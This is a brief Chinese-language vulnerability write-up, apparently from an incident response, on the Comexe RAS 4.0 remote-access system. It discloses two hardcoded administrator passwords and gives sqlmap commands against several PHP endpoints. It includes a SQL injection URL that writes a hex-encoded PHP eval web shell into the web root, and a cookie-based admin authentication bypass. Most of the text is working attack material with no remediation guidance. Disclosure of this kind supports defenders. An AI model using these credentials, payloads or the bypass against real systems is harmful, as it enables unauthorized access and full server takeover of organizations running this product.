应急时碰到的一套系统,简单记录下

0x01 硬编码问题

科迈RAS4.0在安装时会创建2个管理员账户RAS_adminRASCOM,这两个账户硬编码了2组密码,

账户名 密码
RASCOM 1A2b3C4d56.
RAS_admin R1a2b3c4d56.

image-20210607152109481

image-20210607154329449

这就导致如果机器开了RDP,那么可以通过这两组帐密直接登录

0x02 SQL注入问题

审计的时候发现这套源码通过COM组件形式调用的SQL语句,IDA里看到均为直接拼接,没有做过滤

image-20210607154508802

Server/CmxCheckBind.php

image-20210607154911532

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3

Server/CmxBindMachine.php

image-20210607155000257

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxBindMachine.php?m=1&b=2&a=3&c=4" --risk 3 --level 5

Server/CmxUserMap_1.php

image-20210607155055612

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxUserMap_1.php?a=a&b=b&c=c"

Server/CmxGetLoginType.php

image-20210607160517744

http://10.100.100.133:8088/Server/CmxGetLoginType.php?a=admin%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FProgram%20Files%20%28x86%29%2FComexe%2FRasMini%2Frasweb%2FApache2%2Fhtdocs%2Fsmarty-2.6.19%2FServer%2Faa.php%27%20LINES%20TERMINATED%20BY/**/0x3C3F70687020406576616C28245F504F53545B2758275D293B3F3E--%20-

类似的地方还有很多,几乎与数据交互的地方均可注入

0x03 越权

Cookie中添加RAS_Admin_UserInfo_UserName=admin即可以admin登录

image-20210607163152816

image-20210607163234110

0x04 影响范围

image-20210607163548266